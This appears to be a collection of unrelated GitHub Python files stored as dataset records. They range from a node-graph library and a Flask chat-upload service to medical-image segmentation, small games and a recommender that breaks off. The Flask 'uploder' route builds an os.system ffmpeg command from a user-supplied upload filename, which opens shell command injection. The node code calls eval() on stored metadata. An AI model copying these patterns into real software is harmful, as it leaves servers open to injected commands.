hasProperty(self, name):\n if name in ['x', 'y']:\n return True\n return False\n\n def getProperty(self, name):\n if name == 'x':\n return self.item.scenePos().x()\n if name == 'y':\n return self.item.scenePos().y()\n\n def setProperty(self, name, value):\n if name == 'x':\n self.item.setX(value)\n elif name == 'y':\n self.item.setY(value)\n\n def _paramterValueChanged(self, parameter):\n logger.debug('{}, {}'.format(parameter.name(), parameter.getValue()))\n self.parameterValueChanged.emit(parameter)\n self._whenParamterValueChanged(parameter)\n GraphState.executeCallbacks(\n 'parameterValueChanged',\n node=self, parameter=parameter\n )\n\n def _whenParamterValueChanged(self, parameter):\n if parameter.name() == 'name':\n self.item.scene()._afterNodeNameChanged(self.item)\n\n def addParameter(self, parameterName, parameterType, default=None, **kwargs):\n \"\"\"\n :param parameterName:\n :param parameterType:\n :param default:\n :param custom:\n :return:\n \"\"\"\n\n if self.hasParameter(parameterName):\n return self.parameter(parameterName)\n\n parameterClass = Parameter.getParameter(parameterType)\n if parameterClass is None:\n from pyNodeGraph.ui.utils.log import LogWindow\n message = 'Un-Support Parameter Type in addParameter! {}: {}'.format(parameterName, parameterType)\n LogWindow.warning(message)\n logger.warning(message)\n return\n\n label = kwargs.get('label', '')\n\n if label == '':\n label = parameterName\n order = None\n if parameterName.startswith(INPUT_ATTRIBUTE_PREFIX):\n label = parameterName.replace(INPUT_ATTRIBUTE_PREFIX, '')\n if parameterName.startswith(OUTPUT_ATTRIBUTE_PREFIX):\n label = parameterName.replace(OUTPUT_ATTRIBUTE_PREFIX, '')\n kwargs['label'] = label\n\n if parameterName.startswith(OUTPUT_ATTRIBUTE_PREFIX) and 'visible' not in kwargs:\n kwargs['visible'] = False\n\n parameter = parameterClass(\n parameterName,\n parent=self,\n default=default,\n **kwargs\n )\n self._parameters.update({parameterName: parameter})\n self._parametersName.append(parameterName)\n\n self.parameterAdded.emit(parameter)\n\n if parameterName.startswith(INPUT_ATTRIBUTE_PREFIX):\n self.item.addParameterInputPort(\n parameterName, label=label,\n dataType=parameter.__class__\n )\n if parameterName.startswith(OUTPUT_ATTRIBUTE_PREFIX):\n self.item.addParameterOutputPort(\n parameterName, label=label,\n dataType=parameter.__class__\n )\n\n return parameter\n\n def removeParameter(self, parameterName):\n if parameterName in self._parameters:\n # parameter = self.parameter(parameterName)\n self._parameters.pop(parameterName)\n self._parametersName.remove(parameterName)\n self.parameterRemoved.emit(parameterName)\n\n self.item.removeParameterPort(parameterName)\n\n def clearPages(self):\n self.parameterPagesCleared.emit()\n\n def isNodeLocked(self):\n return self.parameter('locked').getValue()\n\n def hasMetadatas(self):\n return self._metadata != {}\n\n def hasMetadata(self, key):\n return key in self._metadata\n\n def setMetadata(self, key, value):\n self._metadata[key] = str(value)\n\n def getMetadataValue(self, key, default=None):\n strValue = self._metadata.get(key, default)\n try:\n value = eval(strValue)\n except:\n value = strValue\n return value\n\n def getMetadataKeys(self):\n return list(self._metadata.keys())\n\n def getMetadatas(self):\n return self._metadata\n\n def getDefaultMetadatas(self):\n return self._defaultMetadata\n\n def getMetadatasAsString(self):\n return json.dumps(self._metadata, indent=4)\n\n def getActions(self):\n actions = [\n ]\n return actions\n\n\nclass DotNode(Node):\n nodeType = 'Dot'\n nodeItemType = 'DotItem'\n\n\nclass FlowDotNode(DotNode):\n nodeType = 'DotF'\n nodeItemType = 'FlowDotItem'\n\n\nclass ParamDotNode(DotNode):\n nodeType = 'DotP'\n nodeItemType = 'ParameterDotItem'\n\n\nclass BackdropNode(Node):\n nodeType = 'Backdrop'\n nodeItemType = 'BackdropItem'\n fillNormalColor = (50, 60, 70, 100)\n borderNormalColor = (50, 60, 70, 100)\n\n @classmethod\n def convertColorTo255(cls, color):\n color = super(BackdropNode, cls).convertColorTo255(color)\n if len(color) == 4:\n color[3] = 100\n return color\n\n def _initParameters(self):\n super(BackdropNode, self)._initParameters()\n\n self.addParameter('width', 'float', builtIn=True, visible=False, hints={'tab': 'Node'})\n self.addParameter('height', 'float', builtIn=True, visible=False, hints={'tab': 'Node'})\n\n def hasProperty(self, name):\n if name in ['width', 'height']:\n return True\n return super(BackdropNode, self).hasProperty(name)\n\n def getProperty(self, name):\n if name == 'width':\n return self.item.w\n if name == 'height':\n return self.item.h\n return super(BackdropNode, self).getProperty(name)\n\n def setProperty(self, name, value):\n super(BackdropNode, self).setProperty(name, value)\n if name == 'width':\n self.item.w = value\n self.item.setSizerPos()\n elif name == 'height':\n self.item.h = value\n self.item.setSizerPos()\n\n\nimport os\nNode.registerExpressionString('os', os)\n\nNode.registerNode(DotNode)\nNode.registerNode(FlowDotNode)\nNode.registerNode(ParamDotNode)\nNode.registerNode(BackdropNode)\n\n","repo_name":"1xinghuan/pyNodeGraph","sub_path":"lib/python/pyNodeGraph/core/node/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":11457,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"73999029850","text":"# Created by Jello on 2017. 6. 29.\nimport time\n\ndef qsort(A):\n if len(A) <= 1:\n return A\n\n pivot = A[0]\n (less, equal, greater) = ([], [A[0]], [])\n\n for x in A[1:]:\n if x < pivot:\n less.append(x)\n elif x == pivot:\n equal.append(x)\n else:\n greater.append(x)\n\n return qsort(less) + equal + qsort(greater)\n\n# test\n\nprint(qsort([1,4,2,6,10,38,12]))\nprint(qsort([9,18,23,53,77]))\nprint(qsort([88,1,4,0,43]))\nprint(qsort([100,3,78,6,223,1]))\n","repo_name":"guswnsxodlf/algorithm","sub_path":"python/ds/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"31593956627","text":"from flask import Blueprint, request, send_file, jsonify\r\nfrom settings import MONGO_DB, IMAGE_PATH, MUSIC_PATH, CHAT_PATH, RET\r\nimport os\r\nfrom bson import ObjectId\r\nfrom uuid import uuid4\r\nfrom baidu_aip.baidu_asr_sync import audio2text, my_nlp_lowb\r\n\r\nget_any = Blueprint(\"get_any\", __name__)\r\n\r\n\r\n@get_any.route(\"/get_music/\")\r\ndef get_music(filename):\r\n filename = os.path.join(MUSIC_PATH, filename)\r\n return send_file(filename)\r\n\r\n\r\n@get_any.route(\"/get_chat/\")\r\ndef get_chat(filename):\r\n filename = os.path.join(CHAT_PATH, filename)\r\n return send_file(filename)\r\n\r\n\r\n@get_any.route(\"/get_image/\")\r\ndef get_image(filename):\r\n filename = os.path.join(IMAGE_PATH, filename)\r\n return send_file(filename)\r\n\r\n\r\n@get_any.route(\"/uploder\", methods=[\"POST\"])\r\ndef uploder():\r\n '''\r\n 上传和保存聊天记录\r\n :return:\r\n '''\r\n record_file = request.files.get(\"record\")\r\n chat_window = request.form.get(\"chat_window\")\r\n user_id = request.form.get(\"user_id\")\r\n record_path = os.path.join(CHAT_PATH, record_file.filename)\r\n record_file.save(record_path)\r\n os.system(f\"ffmpeg -i {record_path} {record_path}.mp3\")\r\n # chat = MONGO_DB.chat.findo_one({\"_id\": ObjectId(chat_window)})\r\n sender_msg = {\r\n \"sender\": user_id,\r\n \"msg\": record_file.filename + \".mp3\"\r\n }\r\n MONGO_DB.chat.update_one({\"_id\": ObjectId(chat_window)}, {\"$push\": {\"chat_list\": sender_msg}})\r\n RET[\"code\"] = 0\r\n RET[\"msg\"] = \"\"\r\n RET[\"data\"] = {}\r\n\r\n return jsonify(RET)\r\n\r\n\r\n@get_any.route(\"/toy_ai\", methods=[\"POST\"])\r\ndef toy_ai():\r\n '''\r\n 语言AI点播\r\n :return:\r\n '''\r\n file_name = f\"{uuid4()}.wav\"\r\n record_file = request.files.get(\"record\")\r\n sender = request.form.get(\"sender\")\r\n # to_user = request.form.get('to_user')\r\n record_path = os.path.join(CHAT_PATH, file_name)\r\n record_file.save(record_path)\r\n text = audio2text(record_path)\r\n print(text)\r\n ret_dict = my_nlp_lowb(text, sender)\r\n return jsonify(ret_dict)\r\n","repo_name":"cs4224485/Toy","sub_path":"serv/get_anything.py","file_name":"get_anything.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71738779610","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\n\n@Date : Fri Nov 14 13:20:38 2014 \\n\n@Author : Erwan Ledoux \\n\\n\n\n\n\nA Vexflower\n\n\"\"\"\n\n#\nimport ShareYourSystem as SYS\nBaseModuleStr=\"ShareYourSystem.Specials.Muzikers.Muziker\"\nDecorationModuleStr=\"ShareYourSystem.Standards.Classors.Classer\"\nSYS.setSubModule(globals())\n#\n\n#\nfrom music21 import vexflow\n#\n\n#\n@DecorationClass()\nclass VexflowerClass(BaseClass):\n\t\n\t#Definition\n\tRepresentingKeyStrsList=[\n\t\t\t\t\t\t\t\t]\n\n\tdef default_init(self,\n\t\t\t\t\t\t_VexflowedMusic21Str=\"\",\n\t\t\t\t\t\t**_KwargVariablesDict\n\t\t\t\t\t):\n\n\t\t#Call the parent __init__ method\n\t\tBaseClass.__init__(self,**_KwargVariablesDict)\n\n\tdef do_vexflow(self):\n\n\t\t#first muzik\n\t\tself.muzik()\n\n\t\t#vexflow now\n\t\tself.VexflowedMusic21Vexflow=vexflow.fromObject(\n\t\t\tself.MuzikedMusic21Converter)\n\n#\n","repo_name":"Ledoux/ShareYourSystem","sub_path":"Pythonlogy/ShareYourSystem/Specials/Muzikers/Vexflower/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4415703030","text":"from loss import DiceLoss, to_one_hot\nfrom model import init_U_Net\nfrom dataset_conversion import BraTSDataset, data_loader\nfrom utils import load_config, load_ckp\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torch \nimport os\nfrom tqdm import tqdm \nimport numpy as np\nfrom utils import crop_index_gen, image_rebuild, image_crop, normalize, inference_output\nimport SimpleITK as sitk\nimport nibabel as nib \nfrom metrics import dice_coe\nimport matplotlib.pyplot as plt \nimport seaborn as sns\nimport time\nimport argparse\n\n\ndef validation(trained_net, \n val_set, \n criterion, \n device,\n batch_size):\n\n '''\n used for valuation during training phase\n\n params trained_net: trained U-net\n params val_set: validation dataset \n params criterion: loss function\n params device: cpu or gpu\n '''\n\n n_val = len(val_set)\n val_loader = val_set.load()\n\n tot = 0 \n acc = 0\n\n with tqdm(total=n_val, desc='Validation round', unit='patch', leave=False) as pbar:\n with torch.no_grad():\n for i, sample in enumerate(val_loader):\n images, segs = sample['image'].to(device=device), sample['seg'].to(device=device)\n\n preds = trained_net(images)\n val_loss = criterion(preds, segs)\n dice_score = dice_coe(preds.detach().cpu(), segs.detach().cpu())\n\n tot += val_loss.detach().item() \n acc += dice_score['avg']\n\n pbar.set_postfix(**{'validation loss (images)': val_loss.detach().item(), 'val_acc':dice_score['avg']})\n pbar.update(images.shape[0])\n\n return tot/(np.ceil(n_val/batch_size)), acc/(np.ceil(n_val/batch_size))\n\n\ndef predict(trained_net, \n model_name,\n test_patient, \n root,\n crop_size=98, \n overlap_size=0, \n save_mask=True):\n\n ''' used for predicting image segmentation after training '''\n\n # load test image\n patient_name = os.path.basename(test_patient)\n modality_dir = os.listdir(test_patient)\n image = []\n for modality in modality_dir:\n if modality != patient_name + '_seg.nii.gz':\n path = os.path.join(test_patient, modality)\n img = sitk.GetArrayFromImage(sitk.ReadImage(path))\n image.append(img)\n else:\n path = os.path.join(test_patient, modality)\n seg = sitk.ReadImage(path)\n seg_arr = sitk.GetArrayFromImage(seg)\n\n image = np.stack(image) # C*D*H*W\n\n # model inference\n trained_net.eval()\n image_shape = image.shape[-3:]\n crop_info = crop_index_gen(image_shape=image_shape, crop_size=crop_size, overlap_size=overlap_size)\n\n image_patches = image_crop(image, crop_info, norm=True, ToTensor=True)\n\n cropped_image_list = np.zeros_like(image_patches.cpu().numpy())\n\n with torch.no_grad():\n with tqdm(total=len(cropped_image_list), desc='inference test image', unit='patch') as pbar:\n for i, image in enumerate(image_patches):\n image = image.unsqueeze(dim=0)\n preds = trained_net(image)\n\n cropped_image_list[i, ...] = preds.squeeze(0).detach().cpu().numpy()\n pbar.update(1)\n\n crop_index = crop_info['index_array']\n rebuild_four_channels = image_rebuild(crop_index, cropped_image_list)\n inferenced_mask = inference_output(rebuild_four_channels) \n\n # calcualte DSC\n target = torch.from_numpy(seg_arr).unsqueeze(0)\n pred = torch.from_numpy(inferenced_mask).unsqueeze(0)\n pred = to_one_hot(pred)\n dsc = dice_coe(pred, target)\n print('DSC by label of this image is: ', dsc)\n\n # plot predicted segmentation\n plt.figure(figsize=(20, 10))\n ground_truth = seg_arr[image_shape[0]//2]\n predicted = inferenced_mask[image_shape[0]//2]\n image_list = [ground_truth, predicted]\n\n subtitles = ['ground truth', 'predicted']\n plt.subplots_adjust(wspace=0.3)\n\n for i in range(1,3):\n ax = plt.subplot(1,2,i)\n ax.set_title(subtitles[i-1])\n sns.heatmap(image_list[i-1], vmin=0, vmax=4, xticklabels=False, yticklabels=False, square=True, cmap='coolwarm', cbar=True)\n\n # save prediction\n save_path = os.path.join(root, 'prediction_results', patient_name)\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n \n mask = sitk.GetImageFromArray(inferenced_mask.astype(np.int16))\n if save_mask:\n plt.savefig(os.path.join(save_path, '{}_2D_prediction_{}.png'.format(patient_name, model_name)))\n\n mask.CopyInformation(seg)\n sitk.WriteImage(mask, os.path.join(save_path, '{}_2D_prediction_{}.nii.gz'.format(patient_name, model_name)))\n\n\ndef predict_use(args):\n\n model_name = args.model_name\n patient_path = args.patient_path\n\n config_file = 'config.yaml'\n cfg = load_config(config_file)\n input_modalites = int(cfg['PARAMETERS']['input_modalites'])\n output_channels = int(cfg['PARAMETERS']['output_channels'])\n base_channels = int(cfg['PARAMETERS']['base_channels'])\n patience = int(cfg['PARAMETERS']['patience'])\n\n ROOT = cfg['PATH']['root'] \n best_dir = cfg['PATH']['best_model_path']\n best_model_dir = os.path.join(ROOT, best_dir)\n device = 'cuda:0' if torch.cuda.is_available() else 'cpu'\n\n # load best trained model\n net = init_U_Net(input_modalites, output_channels, base_channels)\n net.to(device)\n \n optimizer = optim.Adam(net.parameters())\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, verbose=True, patience=patience)\n ckp_path = os.path.join(best_model_dir, model_name + '_best_model.pth.tar')\n net, _, _, _, _, _ = load_ckp(ckp_path, net, optimizer, scheduler)\n\n # predict\n predict(net, model_name, patient_path, ROOT, save_mask=True)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-name', '--model_name', default='baseline_local', type=str, help='which model to be used')\n parser.add_argument('-p', '--patient_path', type=str, help='patient dir')\n args = parser.parse_args()\n\n predict_use(args)\n\nif __name__ == '__main__':\n \n main()\n \n\n \n\n\n\n \n \n\n \n \n\n\n","repo_name":"TUDelftHao/3D-U-Net","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"25998958294","text":"from adn.utils import Logger\nfrom adn.tester import Tester\nfrom adn.models import ADNTest\nfrom skimage.measure import compare_ssim as ssim\nfrom skimage.measure import compare_psnr as psnr\n\n\nclass ADNTester(Tester):\n def __init__(self, **params):\n super(ADNTester, self).__init__(**params)\n \n def get_image(self, data):\n data_opts = self.opts.dataset\n dataset_type = data_opts[\"dataset_type\"]\n if dataset_type == \"deep_lesion\":\n if data_opts[dataset_type][\"load_mask\"]:\n return data['lq_image'], data['hq_image'], data[\"data_name\"], data[\"mask\"]\n else:\n return data['lq_image'], data['hq_image'], data[\"data_name\"]\n elif dataset_type == \"spineweb\":\n return data['a'], data['b'], data[\"data_name\"]\n elif dataset_type == \"nature_image\":\n return data['artifact'], data['no_artifact'], data[\"data_name\"]\n\n def get_metric(self, metric):\n def measure(x, y):\n x = self.dataset.to_numpy(x, False)\n y = self.dataset.to_numpy(y, False)\n x = x * 0.5 + 0.5\n y = y * 0.5 + 0.5\n\n return metric(x, y, data_range=1.0)\n return measure\n\n def get_pairs(self):\n if hasattr(self.model, 'mask'):\n mask = self.model.mask\n img_low = self.model.img_low * mask\n img_high = self.model.img_high * mask\n pred_lh = self.model.pred_lh * mask\n else:\n img_low = self.model.img_low\n img_high = self.model.img_high\n pred_lh = self.model.pred_lh\n\n return [\n (\"before\", (img_low, img_high)), \n (\"after\", (pred_lh, img_high))], self.model.name\n\n def get_visuals(self, n=8):\n lookup = [\n (\"l\", \"img_low\"), (\"ll\", \"pred_ll\"), (\"lh\", \"pred_lh\"),\n (\"h\", \"img_high\"), (\"hl\", \"pred_hl\"), (\"hh\", \"pred_hh\")]\n visual_window = self.opts.visual_window\n \n def visual_func(x):\n x = x * 0.5 + 0.5\n x[x < visual_window[0]] = visual_window[0]\n x[x > visual_window[1]] = visual_window[1]\n x = (x - visual_window[0]) / (visual_window[1] - visual_window[0])\n return x\n\n return self.model._get_visuals(lookup, n, visual_func, False)\n\n def get_logger(self, opts):\n self.logger = Logger(self.run_dir, self.epoch, self.run_name)\n self.logger.add_iter_visual_log(self.get_visuals, 1, \"test_visuals\")\n self.logger.add_metric_log(self.get_pairs,\n ((\"ssim\", self.get_metric(ssim)), (\"psnr\", self.get_metric(psnr))), opts.metrics_step)\n\n return self.logger\n\n def evaluate(self, model, data):\n model.evaluate(*data[:3])\n if len(data) == 4:\n mask = 1 - data[3].to(model.img_high)\n model.mask = mask\n\nif __name__ == \"__main__\":\n tester = ADNTester(\n name=\"adn\", model_class=ADNTest,\n description=\"Test an artifact disentanglement network\")\n tester.run()\n","repo_name":"liaohaofu/adn","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"32"} +{"seq_id":"26915320149","text":"'''\nCreated on Oct 6, 2015\n\n@author: Evan\n'''\nimport random\n#random number import\ncscore=0\npscore=0\n#score start\nwhile cscore<5 and pscore<5: #Loop until computer or player score reaches 5\n comp=random.randint(1,3) #Random number range\n choice=input(\"Please choose 'r'ock, 'p'aper, or 's'cissors\\n\") #Choice\n if comp==1: #Computer choice rock\n if choice==\"r\":\n print(\"Draw. You chose rock. The computer chose rock\\n\")#Player choice rock\n elif choice==\"p\":\n print(\"You won. You chose paper. The computer chose rock\\n\")#Player choice paper\n pscore+=1 #Adds score to player\n elif choice==\"s\":\n print(\"You lost. You chose scissors. The computer chose rock\\n\")#Player choice scissors\n cscore+=1 #Adds score to computer\n else:\n print(\"ERROR! Please choose again.\\n\")\n if comp==2: #Computer choice paper\n if choice==\"r\":\n print(\"You lost. You chose rock. Computer chose paper.\\n\")#Player choice rock\n cscore+=1\n elif choice==\"p\":\n print(\"Draw. You chose paper. Computer chose paper.\\n\")#Player choice paper\n elif choice==\"s\":\n print(\"You won. You chose scissors. Computer chose paper.\\n\")#Player choice scissors\n pscore+=1\n else:\n print(\"ERROR! Please chose again.\\n\")\n if comp==3: #Computer choice scissors\n if choice==\"r\":\n print(\"You win. You chose rock. Computer chose scissors.\\n\")#Player choice rock\n pscore+=1\n elif choice==\"p\":\n print(\"You lost. You chose paper. Computer chose scissors.\\n\")#Player choice paper\n cscore+=1\n elif choice==\"s\":\n print(\"Draw. You chose scissors. Computer chose scissors.\\n\")#Player choice scissors\n else:\n print(\"ERROR! Please chose again.\\n\")\n print(\"The score is now:\\n You: \" +str(pscore)+\"\\nComputer: \" +str(cscore)+ '\\n')#Score after each round\nif cscore==5:\n print(\"The computer won!\")\n#Checks who won and prints it\nelif pscore==5:\n print(\"You won!\")","repo_name":"Demoleas715/PythonWorkspace","sub_path":"Unit2WhileLoops/RockPaperScissors.py","file_name":"RockPaperScissors.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12751552858","text":"\"\"\"Handle functions to the generic novu.\"\"\"\nimport json\nimport logging\nfrom typing import Any\n\nimport requests\nfrom notification_lib.exceptions import NotificationException\n\n\nlogging.getLogger().setLevel(logging.INFO)\n\n\nclass GenericNovuManager:\n \"\"\"Novu utils, template creation/ update.\"\"\"\n\n api_url_generic_novu: str | None\n admin_email_for_generic_novu: str | None\n admin_password_for_generic_novu: str | None\n\n @classmethod\n def get_novu_jwt_bearer_token(cls) -> str:\n \"\"\"Get jwt bearer token.\"\"\"\n login_response = requests.post(\n f\"{cls.api_url_generic_novu}/v1/auth/login\",\n headers={\"Content-Type\": \"application/json\"},\n data=json.dumps(\n {\n \"email\": cls.admin_email_for_generic_novu,\n \"password\": cls.admin_password_for_generic_novu,\n }\n ),\n timeout=10,\n )\n\n if login_response.status_code // 100 == 2:\n return login_response.json()[\"data\"][\"token\"]\n\n logging.error(f\"status code: {login_response.status_code}\")\n logging.error(f\"response : {login_response.json()}\")\n raise NotificationException(\"Erreur lors de l'authentification au novu generic\")\n\n @classmethod\n def get_generic_novu_templates(cls) -> list[dict[str, Any]]:\n \"\"\"Get templates from the generic novu.\"\"\"\n response = requests.get(\n url=f\"{cls.api_url_generic_novu}/v1/notification-templates\",\n headers={\"Authorization\": f\"Bearer {cls.get_novu_jwt_bearer_token()}\"},\n timeout=5,\n )\n\n if response.status_code // 100 == 2:\n return response.json()[\"data\"]\n\n logging.error(f\"status code: {response.status_code}\")\n logging.error(f\"response : {response.json()}\")\n raise NotificationException(\"Erreur lors de l'importation des templates\")\n\n @staticmethod\n def format_filter_to_create_update(filter_from_generic: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Take useful fields for the filter.\"\"\"\n\n return {\n key: filter_from_generic[key]\n for key in filter_from_generic.keys()\n if key in {\"children\", \"isNegated\", \"type\", \"value\"}\n }\n\n @staticmethod\n def format_steps_to_create_update(\n steps_from_generic: list[dict[str, Any]]\n ) -> list[dict[str, Any]]:\n \"\"\"Format the steps that we get from generic novu so that we can use it in creation and update.\"\"\"\n logging.info(f\"generic steps: {steps_from_generic}\")\n steps = []\n\n for step in steps_from_generic:\n formated_template = {\n \"type\": step[\"template\"][\"type\"],\n \"active\": step[\"template\"][\"active\"],\n \"variables\": step[\"template\"][\"variables\"],\n \"content\": step[\"template\"][\"content\"],\n }\n if step[\"template\"][\"type\"] == \"push\":\n # Push notification has \"title\" as their content key\n formated_template[\"title\"] = step[\"template\"][\"title\"]\n\n # If customHtml is true, it means we are passing a custom html\n if step[\"template\"][\"type\"] == \"email\":\n if \"contentType\" in step[\"template\"]:\n # Subject is the title of the email\n formated_template[\"subject\"] = step[\"template\"][\"subject\"]\n # Content is body of the email\n formated_template[\"content\"] = step[\"template\"][\"content\"]\n # contentType = customHtml indicates that the content is a custom html\n formated_template[\"contentType\"] = \"customHtml\"\n else:\n # Subject is the title of the email\n formated_template[\"subject\"] = step[\"template\"][\"subject\"]\n\n steps.append(\n {\n \"active\": step[\"active\"],\n \"filters\": [\n GenericNovuManager.format_filter_to_create_update(step_filter)\n for step_filter in step[\"filters\"]\n ],\n \"template\": formated_template,\n }\n )\n\n logging.info(f\"formatted steps: {steps}\")\n return steps\n\n @classmethod\n def get_generic_template_by_id(cls, template_id: str) -> dict[str, Any]:\n \"\"\"Get generic template by providing his id.\"\"\"\n response = requests.get(\n url=f\"{cls.api_url_generic_novu}/v1/notification-templates/{template_id}\",\n headers={\"Authorization\": f\"Bearer {cls.get_novu_jwt_bearer_token()}\"},\n timeout=5,\n )\n\n if response.status_code == 200:\n result = response.json()[\"data\"]\n return {\n \"template_name\": result[\"name\"],\n \"id\": result[\"_id\"],\n \"steps\": cls.format_steps_to_create_update(result[\"steps\"]),\n }\n\n logging.error(f\"status code: {response.status_code}\")\n logging.error(f\"response : {response.json()}\")\n raise NotificationException(\"Erreur lors de l'importation du template\")\n","repo_name":"myenergymanager/notification-myem-lib","sub_path":"notification_lib/novu_manager/generic_novu_manager.py","file_name":"generic_novu_manager.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24396194328","text":"import os\nimport json\nfrom colorama import Fore\n\n\nclass Player:\n def __init__(self, name, record):\n self.name = name\n self.record = record\n\n\nclass Data:\n @staticmethod\n def get_records():\n try:\n with open(\"data/records.json\") as file:\n data = json.load(file)\n file.close()\n return data\n except:\n Data.create_record_file()\n return Data.get_records()\n\n @staticmethod\n def create_record_file():\n if not os.path.exists(\"data\"): os.mkdir(\"data\")\n file = open(\"data/records.json\", \"w\")\n file.write(\"[]\")\n file.close()\n\n @staticmethod\n def check_name(name):\n while not isinstance(name, str) and 3 > len(name) > 15:\n name = input(\"Please write a valid name: \")\n\n return name\n\n @staticmethod\n def get_player(name):\n data = Data.get_records()\n\n for rec in data:\n if rec[\"name\"] == name: return Player(rec[\"name\"], rec[\"record\"])\n\n return False\n\n @staticmethod\n def create_player():\n player_name = Data.check_name(input(\"What's your name fellow player?: \"))\n player_object = Data.get_player(player_name)\n if not player_object: return Player(player_name, \"No record yet.\")\n else: return player_object\n\n @staticmethod\n def write_record(player):\n data = Data.get_records()\n file = open(\"data/records.json\", \"w\")\n exists = False\n\n for rec in data:\n if rec[\"name\"] == player.name:\n if rec[\"record\"] < player.record:\n rec[\"record\"] = player.record\n exists = True\n break\n\n if not exists: data.append({\n \"name\": player.name,\n \"record\": player.record\n })\n\n json.dump(data, file)\n file.close()\n\n @staticmethod\n def get_top_players():\n data = Data.get_records()\n sorted_data = sorted(data, key=lambda obj: obj[\"record\"], reverse=True)\n top_board = \"\"\n for i, player in enumerate(sorted_data, start=1):\n if i == 1: top_board += Fore.LIGHTRED_EX\n elif i == 2: top_board += Fore.LIGHTYELLOW_EX\n elif i == 3: top_board += Fore.YELLOW\n else: top_board+= Fore.RESET\n\n top_board += f\"\\t\\t{i}. {player['name']}: {player['record']} points.\\n\"\n\n return top_board\n","repo_name":"EloyRDev/Snython","sub_path":"src/data_management.py","file_name":"data_management.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39763483935","text":"class Solution:\n def intToRoman(self, num: int) -> str:\n values = [ 1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1 ]\n numerals = [ \"M\", \"CM\", \"D\", \"CD\", \"C\", \"XC\", \"L\", \"XL\", \"X\", \"IX\", \"V\", \"IV\", \"I\" ]\n res = \"\"\n for i, v in enumerate(values):\n if num>=v:\n res =res+ numerals[i]*(num//v)\n num =num % v\n return res","repo_name":"narendrasinghdangi/leetcode-problems","sub_path":"0012-integer-to-roman/0012-integer-to-roman.py","file_name":"0012-integer-to-roman.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16769051812","text":"#10-27\n#使用神经网络实现协同过滤算法\n#测试无误\n#算法时间大约在1min\n\nimport numpy as np\nimport sys\nimport scipy.io as sio\nimport scipy.optimize as opt\n\n#r(i,j):表示用户j评价了电影i\n# y(i,j):用户j对电影i的评价等级(如果用户评价过该电影)\n\n# x(i):电影i的特征向量\n# θ(j):用户j对电影评价的参数\n\n#隐语义模型 基于机器学习的方法\nclass lfmRS(object):\n def __init__(self):\n self.initialset = {}\n # self.user_matrix=[]\n self.r=[]\n self.y=[]\n self.x=[]\n self.theta=[]\n self.n_features=50\n self.l=10\n self.movie_list=[]\n self.n_rec_movie = 3\n\n print('recommended movie number = %d' %\n self.n_rec_movie, file=sys.stderr)\n\n #导入数据\n @staticmethod\n def loadfile(filename):\n fr=open(filename,'r',encoding='UTF-8')\n\n for i ,line in enumerate(fr):\n yield line.strip('\\r\\n')\n\n fr.close()\n print(\"load %s sucess\" % filename,file=sys.stderr)\n\n\n #初始数据集\n def initial_dataset(self,filename1):\n initialset_len=0\n\n for lines in self.loadfile(filename1):\n id,users,movies,ratings=lines.split(',')\n # print(users,movies,ratings)\n self.initialset.setdefault(users,{})\n self.initialset[users][movies]=(ratings)\n initialset_len+=1\n\n # for key,value in self.initialset.items():\n # print(key,value)\n # self.user_matrix.append(key)\n\n print(\"load data set sucess\" , file=sys.stderr)\n print('datase=%s' % initialset_len,file=sys.stderr)\n\n\n\n #得到电影-用户矩阵\n #r(i,j):表示用户j评价了电影i\n #y(i,j):用户j对电影i的评价等级(如果用户评价过该电影)\n #初始化x theta\n def build_matrix(self,filename1,filename2):\n movie_len=0\n user_len=0\n\n movie_matrix=[]\n user_matrix=[]\n\n for lines in self.loadfile(filename2):\n imdbid=lines.split(',')[0]\n title=lines.split(',')[1]#读入电影名称\n self.movie_list.append(title)\n movie_matrix.append(imdbid)\n movie_len+=1\n\n\n for lines in self.loadfile(filename1):\n id=lines.split(',')[0]\n user_matrix.append(id)\n user_len+=1\n\n print(\"user:%d,movie:%d\" %(user_len,movie_len),file=sys.stderr)\n\n self.r=np.zeros((movie_len,user_len))\n self.y = np.zeros((movie_len, user_len))\n\n for key,value in self.initialset.items():\n for i in value:\n for k in range(len(movie_matrix)): #找到电影在原数组中的对应位置\n if (movie_matrix[k] == i):\n mvid=k\n break\n self.r[mvid][int(key) - 1000 - 1] = self.initialset[key][i]\n self.y[mvid][int(key) - 1000 - 1]=1\n\n\n # 参数处理\n\n # 为了将x和theat放在一个值内进行传递\n # 合并\n def merge(self,x, theta):\n return np.concatenate((x.ravel(), theta.ravel()))\n\n # 分离\n def separate(self,param, n_movies, n_users, n_features):\n return param[:n_movies * n_features].reshape(n_movies, n_features), param[n_movies * n_features:].reshape(\n n_users, 